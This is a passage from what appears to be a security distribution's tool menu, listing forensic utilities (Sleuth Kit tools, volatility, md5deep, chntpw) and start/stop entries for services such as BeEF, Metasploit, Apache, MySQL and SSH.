  • autopsy 
  • binwalk 
  • blkcalc 
  • blkcat 
  • blkstat 
  • bulk_extractor 
  • ffind 
  • fls 
  • foremost 
  • galleta 
  • hfind 
  • icat-sleuthkit 
  • ifind ifind 
  • ils-sleuthkit 
  • istat 
  • jcat 
  • mactime-sleuthkit 
  • missidentify 
  • mmcat 
  • pdgmail 
  • readpst 
  • reglookup
  • sigfind 
  • sorter 
  • srch-strings 
  • tsk_recover 
  • vinetto

 


Forensics → Forensic Hashing Tools
  • md5deep 
  • rahash2

 

Forensics → Forensic Suites
  • autopsy 
  • dff

 

Forensics → Password Forensic Tools
  • chntpw

 

Forensics → RAM Forensioc Tools
  • volafox 
  • volatility 


System Services → BeEF
  • beef start
  • beef stop


System Services → Dradis
  • dradis start
  • dradis stop


System Services → HTTP
  • apache2 restart 
  • apache2 start 
  • apache2 stop

System Services → Metasploit
  • community / pro start 
  • community / pro stop


System Services → MySQL
  • mysql restart 
  • mysql start 
  • mysql stop


System Services → SSH
  • sshd restart 
  • sshd start 
  • sshd stop